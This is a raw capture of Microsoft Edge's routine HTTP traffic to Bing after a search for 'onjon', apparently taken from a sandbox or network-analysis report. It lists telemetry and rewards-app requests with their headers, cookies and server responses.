cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f10528
GET

https://www.bing.com/images/sbi?mmasync=1&ig=5AD7030C91584719B4F5E41231459495&iid=.5098&ptn=Web&ep=0&iconpl=1

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /images/sbi?mmasync=1&ig=5AD7030C91584719B4F5E41231459495&iid=.5098&ptn=Web&ep=0&iconpl=1 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f10529
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885917%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1733306886085%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22Time%22%3A1750%2C%22time%22%3A1753%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1733306886097%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22SearchHarder%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306885917%2C%22Name%22%3A%22ButtonHidden%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1733306886085%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22Time%22%3A1750%2C%22time%22%3A1753%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1733306886097%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f1052a
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1753%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306886098%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1753%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306886098%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000

Response

HTTP/2.0 200

content-length: 770
content-type: text/html; charset=utf-8
cache-control: no-cache, no-store, must-revalidate
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67502a0f861c4e71a3d799fccb467da7
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-3OchhdmOKmqHqrKXwZq91/uf6OqJ5nX6AeR1GphSxVk='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 67502a0f861c4e71a3d799fccb467da7|AFD:67502a0f861c4e71a3d799fccb467da7|2024-12-04T10:08:15.181Z
date: Wed, 04 Dec 2024 10:08:15 GMT
set-cookie: _C_ETH=1; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f1055c
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1753%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306886098%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1753%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306886098%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000

Response

HTTP/2.0 200

content-length: 16001
content-type: text/html; charset=utf-8
cache-control: private
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a0f9f7e4f8f984a4ac86c6879cc
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-UkSxZBIHsra7V51IzyR9qZAz5zBiFGzkEiQ6rYgt3bA='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:15 GMT
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:15 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f1050e
POST

https://www.bing.com/rewardsapp/ncheader?ver=51619320&IID=SERP.5055&IG=5AD7030C91584719B4F5E41231459495

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /rewardsapp/ncheader?ver=51619320&IID=SERP.5055&IG=5AD7030C91584719B4F5E41231459495 HTTP/2.0
host: www.bing.com
content-length: 4
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000

Response

HTTP/2.0 200

content-length: 991
content-type: text/html; charset=utf-8
cache-control: no-cache
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67502a0f6fca403f84459c1d91632471
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-nXarEo92Hag/pKP3npUVpb3QQYC8tIz64DsoSSQZuMc='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 67502a0f6fca403f84459c1d91632471|AFD:67502a0f6fca403f84459c1d91632471|2024-12-04T10:08:15.185Z
date: Wed, 04 Dec 2024 10:08:15 GMT
set-cookie: _C_ETH=1; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
set-cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; domain=.bing.com; expires=Thu, 04-Dec-2025 10:08:15 GMT; path=/; secure; SameSite=None
set-cookie: _Rwho=u=d&ts=2024-12-04; domain=.bing.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f1055d
POST

https://www.bing.com/rewardsapp/reportActivity?IG=5AD7030C91584719B4F5E41231459495&IID=SERP.5064&q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /rewardsapp/reportActivity?IG=5AD7030C91584719B4F5E41231459495&IID=SERP.5064&q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531 HTTP/2.0
host: www.bing.com
content-length: 154
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000

Response

HTTP/2.0 200

cache-control: no-store, must-revalidate, no-cache, max-age=0
content-type: application/json; charset=utf-8
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67502a0e196945de924b1e018b52179d
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
